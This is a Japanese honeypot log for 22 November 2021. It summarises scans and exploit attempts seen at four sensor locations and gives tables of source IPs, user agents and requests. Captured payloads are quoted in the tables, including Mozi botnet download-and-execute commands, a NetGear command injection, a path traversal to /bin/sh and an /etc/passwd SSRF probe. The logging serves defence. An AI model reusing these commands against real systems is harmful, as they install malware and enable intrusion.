ハニーポット(仮) 観測記録 2021/11/22分です。
特徴
共通
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Laravelへのスキャン行為
Location:JP
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:US
GPONルータの脆弱性を狙うアクセス
Metabaseの脆弱性(CVE-2021-41277)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Apache Solrへのスキャン行為
85[.]206[.]160[.]115に関する不正通信
5[.]188[.]210[.]227に関する不正通信
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
curlによるスキャン行為
Nmap Scripting Engineによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//219[.]155[.]24[.]103:57531/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
13.67.44.234に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.245.96.227/bins/arm; chmod 777 /tmp/arm; sh /tmp/arm selfrep[.]jaws
他
アクセス数推移
JP:総アクセス数:76 (前日比:-40)
US:総アクセス数:130 (前日比:+30)
UK:総アクセス数:112 (前日比:+75)
SG:総アクセス数:128 (前日比:+74)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 3.236.16.141 | United States |
| 1 | 23.129.64.143 | United States |
| 14 | 35.86.230.169 | United States |
| 1 | 45.137.21.9 | Bangladesh |
| 8 | 45.146.164.110 | Russia |
| 2 | 51.158.156.78 | France |
| 1 | 68.183.3.64 | United States |
| 1 | 89.25.206.171 | Poland |
| 3 | 89.248.165.52 | United Kingdom |
| 1 | 120.85.92.167 | China |
| 1 | 134.122.50.125 | United States |
| 10 | 135.125.244.48 | France |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 143.244.189.0 | United States |
| 2 | 157.245.70.127 | United States |
| 4 | 159.203.18.202 | United States |
| 3 | 161.35.212.57 | United States |
| 1 | 165.232.86.149 | United States |
| 1 | 167.71.135.82 | United States |
| 1 | 167.99.186.121 | United States |
| 1 | 172.104.138.223 | United States |
| 1 | 180.149.125.173 | Mongolia |
| 2 | 183.136.226.4 | China |
| 1 | 192.241.211.199 | United States |
| 1 | 192.241.212.170 | United States |
| 5 | 209.141.34.220 | United States |
| 3 | 209.141.46.14 | United States |
| 1 | 220.198.209.29 | China |
| 2 | 222.186.19.235 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 1 | Hello, World |
| 1 | Hello, world |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 36 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 |
| 8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html) |
| 1 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.18.4 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | \x16\x03\x01 | ||
| 2 | \x16\x03\x01\x01\xfa\x01 | ||
| 1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
| 23 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 2 | GET | /AirWatch | HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /actuator/health | HTTP/1.1 |
| 1 | GET | /admin/.env | HTTP/1.1 |
| 1 | GET | /api/.env | HTTP/1.1 |
| 1 | GET | /app/.env | HTTP/1.1 |
| 1 | GET | /aws.yml | HTTP/1.1 |
| 1 | GET | /beta/.env | HTTP/1.1 |
| 1 | GET | /c/ | HTTP/1.1 |
| 1 | GET | /config/.env | HTTP/1.1 |
| 8 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /core/.env | HTTP/1.1 |
| 1 | GET | /dispatch.asp | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /fuN3 | HTTP/1.0 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /kyc/.env | HTTP/1.1 |
| 1 | GET | /laravel/.env | HTTP/1.1 |
| 1 | GET | /laravel/core/.env | HTTP/1.1 |
| 1 | GET | /photo/ | HTTP/1.1 |
| 1 | GET | /prod/.env | HTTP/1.1 |
| 1 | GET | /public/.env | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | http[:]//fuwu[.]sogou[.]com/404/index.html | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.227 | Russia |
| 2 | 31.209.100.191 | Cyprus |
| 4 | 34.221.254.102 | United States |
| 1 | 37.44.238.177 | France |
| 3 | 45.137.21.9 | Bangladesh |
| 8 | 45.146.164.110 | Russia |
| 1 | 50.112.196.182 | United States |
| 1 | 77.83.36.32 | Ukraine |
| 6 | 87.106.193.196 | Germany |
| 54 | 88.80.186.144 | United States |
| 9 | 89.248.165.52 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 1 | 103.114.158.1 | China |
| 2 | 107.152.154.137 | Canada |
| 1 | 117.196.56.201 | India |
| 1 | 117.221.187.152 | India |
| 1 | 128.1.248.42 | United States |
| 1 | 134.122.80.186 | United States |
| 1 | 137.184.209.78 | United States |
| 9 | 137.184.214.146 | United States |
| 1 | 137.184.232.16 | United States |
| 1 | 139.59.252.71 | Singapore |
| 1 | 139.162.145.250 | Netherlands |
| 2 | 145.239.154.84 | France |
| 1 | 157.245.32.56 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 167.71.139.216 | United States |
| 1 | 183.187.64.74 | China |
| 1 | 192.241.209.27 | United States |
| 1 | 198.54.128.94 | United States |
| 1 | 209.17.96.186 | United States |
| 4 | 209.141.34.220 | United States |
| 1 | 209.141.46.14 | United States |
| 3 | 222.186.19.235 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 1 | CVE-2021-41277 |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 6 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 4 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 |
| 17 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html) |
| 4 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 53 | curl/7.54.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 6 | - | ||
| 1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
| 3 | \x03 | ||
| 1 | \x16\x03 | ||
| 3 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01\xfb\x01 | ||
| 1 | \x16\x03\x01\x02 | ||
| 2 | CONNECT | 85[.]206[.]160[.]115:80 | HTTP/1.1 |
| 1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
| 17 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/HEAD | HTTP/1.1 |
| 1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | HTTP/1.1 |
| 1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /CSS/Miniweb.css | HTTP/1.1 |
| 1 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /Portal/Portal.mwsl | HTTP/1.1 |
| 1 | GET | /Portal0000.htm | HTTP/1.1 |
| 1 | GET | /WScO | HTTP/1.1 |
| 1 | GET | /__Additional | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 2 | GET | /_profiler/phpinfo | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /admin.aspx | HTTP/1.1 |
| 1 | GET | /admin.jsa | HTTP/1.1 |
| 1 | GET | /admin.jsp | HTTP/1.1 |
| 1 | GET | /admin.php | HTTP/1.1 |
| 1 | GET | /admin.shtml | HTTP/1.1 |
| 1 | GET | /api/geojson?url=file:///etc/passwd | HTTP/1.1 |
| 1 | GET | /base.jsp | HTTP/1.1 |
| 1 | GET | /base.pl | HTTP/1.1 |
| 1 | GET | /base.shtml | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
| 5 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /debug/default/view?panel=config | HTTP/1.1 |
| 1 | GET | /default.cfm | HTTP/1.1 |
| 1 | GET | /default.cgi | HTTP/1.1 |
| 1 | GET | /default.php | HTTP/1.1 |
| 4 | GET | /dispatch.asp | HTTP/1.1 |
| 1 | GET | /docs/cplugError.html/ | HTTP/1.1 |
| 3 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /home.cgi | HTTP/1.1 |
| 1 | GET | /home.html | HTTP/1.1 |
| 1 | GET | /home.jsa | HTTP/1.1 |
| 1 | GET | /index.cfm | HTTP/1.1 |
| 1 | GET | /index.jhtml | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /indice.asp | HTTP/1.1 |
| 1 | GET | /indice.html | HTTP/1.1 |
| 1 | GET | /indice.jhtml | HTTP/1.1 |
| 1 | GET | /indice.pl | HTTP/1.1 |
| 1 | GET | /inicio.asp | HTTP/1.1 |
| 1 | GET | /localstart.jsp | HTTP/1.1 |
| 1 | GET | /main.cgi | HTTP/1.1 |
| 1 | GET | /main.jsa | HTTP/1.1 |
| 1 | GET | /main.php | HTTP/1.1 |
| 1 | GET | /manager/text/list | HTTP/1.1 |
| 1 | GET | /menu.aspx | HTTP/1.1 |
| 1 | GET | /menu.cgi | HTTP/1.1 |
| 1 | GET | /menu.jsa | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1637515379 | HTTP/1.1 |
| 1 | GET | /pools | HTTP/1.1 |
| 1 | GET | /pools/default/buckets | HTTP/1.1 |
| 1 | GET | /readme.txt | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /server-status | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//183[.]187[.]64[.]74:57860/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /start.asp | HTTP/1.1 |
| 1 | GET | /start.aspx | HTTP/1.1 |
| 1 | GET | /start.jsa | HTTP/1.1 |
| 1 | GET | /start.shtml | HTTP/1.1 |
| 5 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /webfig/ | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
| 2 | GET | http[:]//fuwu[.]sogou[.]com/404/index.html | HTTP/1.1 |
| 4 | HEAD | / | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /scripts/WPnBr.dll | HTTP/1.1 |
| 1 | POST | /sdk | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.227 | Russia |
| 8 | 8.218.191.185 | Singapore |
| 1 | 37.44.238.177 | France |
| 1 | 42.51.19.26 | China |
| 1 | 42.233.107.20 | China |
| 2 | 45.137.21.9 | Bangladesh |
| 8 | 45.146.164.110 | Russia |
| 1 | 51.13.115.7 | United Kingdom |
| 1 | 77.83.36.32 | Ukraine |
| 3 | 89.248.165.52 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 3 | 103.19.191.55 | Hong Kong |
| 1 | 120.86.239.164 | China |
| 65 | 130.61.112.134 | United States |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 165.22.93.246 | United States |
| 1 | 180.149.125.170 | Mongolia |
| 1 | 192.241.198.202 | United States |
| 1 | 192.241.214.170 | United States |
| 1 | 205.185.122.184 | United States |
| 1 | 209.17.97.106 | United States |
| 4 | 209.141.34.220 | United States |
| 2 | 209.141.46.14 | United States |
| 1 | 219.155.24.103 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 1 | Chrome/54.0 (Windows NT 10.0) |
| 1 | Hello, world |
| 3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 65 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html) |
| 4 | Mozilla/5.0 (compatible;) |
| 3 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.75.0 |
| 1 | python-requests/2.18.4 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 3 | \x03 | ||
| 2 | \x16\x03\x01 | ||
| 2 | \x16\x03\x01\x02 | ||
| 1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/HEAD | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /HNAP1 | HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /actuator/health | HTTP/1.1 |
| 1 | GET | /admin/info/config | HTTP/1.1 |
| 1 | GET | /api/spec.json | HTTP/1.1 |
| 1 | GET | /c/ | HTTP/1.1 |
| 6 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 1 | GET | /console/css/%252E%252E%252Fconsole.portal | HTTP/1.1 |
| 1 | GET | /console/css/%252e%252e%252fconsole.portal | HTTP/1.1 |
| 1 | GET | /console/images/%252E%252E%252Fconsole.portal | HTTP/1.1 |
| 1 | GET | /console/images/%252e%252e%252fconsole.portal | HTTP/1.1 |
| 3 | GET | /dispatch.asp | HTTP/1.1 |
| 1 | GET | /evox/about | HTTP/1.1 |
| 3 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1637486956 | HTTP/1.1 |
| 1 | GET | /opc/v1/identity | HTTP/1.1 |
| 1 | GET | /opc/v1/instance | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 2 | GET | /pmd/index.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//219[.]155[.]24[.]103:57531/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /spec/api.json | HTTP/1.1 |
| 1 | GET | /text4041637435373 | HTTP/1.1 |
| 1 | GET | /ui | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
| 1 | HEAD | /actuator | HTTP/1.1 |
| 1 | HEAD | /actuator/auditevents | HTTP/1.1 |
| 1 | HEAD | /actuator/beans | HTTP/1.1 |
| 1 | HEAD | /actuator/conditions | HTTP/1.1 |
| 1 | HEAD | /actuator/configprops | HTTP/1.1 |
| 1 | HEAD | /actuator/env | HTTP/1.1 |
| 1 | HEAD | /actuator/health | HTTP/1.1 |
| 1 | HEAD | /actuator/heapdump | HTTP/1.1 |
| 1 | HEAD | /actuator/httptrace | HTTP/1.1 |
| 1 | HEAD | /actuator/hystrix.stream | HTTP/1.1 |
| 1 | HEAD | /actuator/info | HTTP/1.1 |
| 1 | HEAD | /actuator/jolokia | HTTP/1.1 |
| 1 | HEAD | /actuator/loggers | HTTP/1.1 |
| 1 | HEAD | /actuator/mappings | HTTP/1.1 |
| 1 | HEAD | /actuator/metrics | HTTP/1.1 |
| 1 | HEAD | /actuator/scheduledtasks | HTTP/1.1 |
| 1 | HEAD | /actuator/threaddump | HTTP/1.1 |
| 1 | HEAD | /auditevents | HTTP/1.1 |
| 1 | HEAD | /autoconfig | HTTP/1.1 |
| 1 | HEAD | /beans | HTTP/1.1 |
| 1 | HEAD | /cloudfoundryapplication | HTTP/1.1 |
| 1 | HEAD | /configprops | HTTP/1.1 |
| 1 | HEAD | /dump | HTTP/1.1 |
| 1 | HEAD | /env | HTTP/1.1 |
| 1 | HEAD | /health | HTTP/1.1 |
| 1 | HEAD | /heapdump | HTTP/1.1 |
| 1 | HEAD | /hystrix.stream | HTTP/1.1 |
| 1 | HEAD | /info | HTTP/1.1 |
| 1 | HEAD | /jolokia | HTTP/1.1 |
| 1 | HEAD | /loggers | HTTP/1.1 |
| 1 | HEAD | /mappings | HTTP/1.1 |
| 1 | HEAD | /metrics | HTTP/1.1 |
| 1 | HEAD | /threaddump | HTTP/1.1 |
| 1 | HEAD | /trace | HTTP/1.1 |
| 11 | OPTIONS | / | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 2 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
| 2 | POST | /sdk | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 3 | PROPFIND | / | HTTP/1.1 |
| 1 | TXCD | / | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 33 | 13.82.227.146 | United States |
| 2 | 13.92.113.106 | United States |
| 3 | 20.40.91.59 | United States |
| 4 | 20.120.29.45 | United States |
| 1 | 27.203.4.162 | China |
| 1 | 37.44.238.177 | France |
| 33 | 40.65.99.132 | United States |
| 1 | 45.137.21.9 | Bangladesh |
| 1 | 45.144.225.176 | Netherlands |
| 5 | 45.146.164.110 | Russia |
| 1 | 51.158.156.78 | France |
| 1 | 80.108.92.165 | Austria |
| 1 | 87.240.67.152 | France |
| 3 | 89.248.165.52 | United Kingdom |
| 2 | 94.232.43.63 | Russia |
| 1 | 103.28.70.137 | United States |
| 1 | 115.56.138.50 | China |
| 1 | 117.213.44.138 | India |
| 1 | 119.36.45.80 | China |
| 1 | 134.122.50.125 | United States |
| 1 | 135.125.217.54 | France |
| 8 | 137.184.214.146 | United States |
| 1 | 139.162.145.250 | Netherlands |
| 1 | 143.110.227.92 | United States |
| 2 | 157.230.216.203 | United States |
| 1 | 157.245.150.253 | United States |
| 3 | 163.172.159.134 | United Kingdom |
| 1 | 179.60.141.4 | Brazil |
| 1 | 180.149.125.162 | Mongolia |
| 1 | 192.241.208.241 | United States |
| 1 | 192.241.215.104 | United States |
| 1 | 209.17.96.74 | United States |
| 5 | 209.141.34.220 | United States |
| 1 | 209.141.46.14 | United States |
| 1 | 210.12.53.50 | China |
| 2 | 222.186.19.235 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 25 | - |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/56.0.3051.43 |
| 66 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 |
| 1 | Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30 |
| 12 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 |
| 6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.18.4 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 11 | \x03 | ||
| 2 | \x16\x03\x01 | ||
| 1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 | HTTP/1.1 |
| 1 | CONNECT | www[.]bing[.]com:443 | HTTP/1.1 |
| 14 | GET | /.env | HTTP/1.1 |
| 2 | GET | /13.67.44.234/.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /AirWatch | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /actuator/health | HTTP/1.1 |
| 2 | GET | /admin/.env | HTTP/1.1 |
| 2 | GET | /api/.env | HTTP/1.1 |
| 2 | GET | /app/.env | HTTP/1.1 |
| 2 | GET | /app/config/.env | HTTP/1.1 |
| 2 | GET | /apps/.env | HTTP/1.1 |
| 2 | GET | /audio/.env | HTTP/1.1 |
| 2 | GET | /backend/.env | HTTP/1.1 |
| 2 | GET | /base/.env | HTTP/1.1 |
| 2 | GET | /blog/.env | HTTP/1.1 |
| 1 | GET | /c/ | HTTP/1.1 |
